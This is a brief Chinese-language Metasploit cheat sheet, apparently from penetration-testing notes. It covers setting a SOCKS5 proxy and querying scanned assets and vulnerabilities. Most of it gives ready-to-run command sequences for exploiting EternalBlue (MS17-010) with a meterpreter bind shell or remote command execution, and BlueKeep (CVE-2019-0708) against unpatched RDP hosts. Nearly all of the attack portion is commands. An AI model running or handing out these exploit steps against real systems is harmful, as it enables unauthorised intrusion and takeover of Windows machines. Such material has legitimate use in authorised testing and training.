-
1 setg Proxies socks5:你的socksIP:端口
-
MSF 扫描到的资产或者漏洞保存在数据库,方便我们梳理,常用的就是这两个语句:
services 查看扫描到的资产IP及端口 vulns 查看扫描到的漏洞资产
-
关于永恒之蓝的利用
如果目标操作系统是 Win7x64、2008x64 的,可以直接使用正向代理 exploit 利用模块打过去:
1 use exploit/windows/smb/ms17_010_eternalblue 2 set payload windows/x64/meterpreter/bind_tcp 3 run
要是目标系统是 2003x32、Win7x32 的只能使用这个模块去执行命令
use auxiliary/admin/smb/ms17_010_command set command whoami run
-
CVE-2019-0708-远程代码执行
目标开启了 3389,且未打补丁
1 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2 run